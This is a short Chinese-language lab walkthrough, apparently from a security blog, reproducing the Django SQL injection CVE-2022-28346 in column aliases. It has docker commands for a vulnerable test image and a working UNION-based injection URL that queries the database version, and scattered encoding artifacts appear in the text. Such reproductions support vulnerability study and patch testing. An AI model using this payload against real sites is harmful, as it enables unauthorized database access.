Django 是用 Python 開發(fā)的一個(gè)免費(fèi)開源的 Web 框架�,幾乎囊括了 Web 應(yīng)用的方方面面,可以用于快速搭建高性能�����、優(yōu)雅的網(wǎng)站�,Django 提供了許多網(wǎng)站后臺開發(fā)經(jīng)常用到的模塊,使開發(fā)者能夠?qū)W⒂跇I(yè)務(wù)部分��。
攻擊者使用精心編制的字典�����, 通過**kwargs傳遞給QuerySet.annotate()、aggregate()和extra()這些方法�����,可導(dǎo)致這些方法在列別名中受到SQL注入攻擊�。docker pull s0cke3t/cve-2022-28346:latest
docker run -d -p 8080:8000 s0cke3t/cve-2022-28346
通過報(bào)錯(cuò)頁面可以發(fā)現(xiàn)存在哪些接口
訪問接口如果存在傳參,同樣會提示報(bào)錯(cuò)信息
使用報(bào)錯(cuò)提示的參數(shù)進(jìn)行sql注入
http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
經(jīng)營性網(wǎng)站備案信息
可信網(wǎng)站信用評價(jià)
網(wǎng)絡(luò)警察提醒您
誠信網(wǎng)站
中國互聯(lián)網(wǎng)舉報(bào)中心
網(wǎng)絡(luò)舉報(bào)APP下載
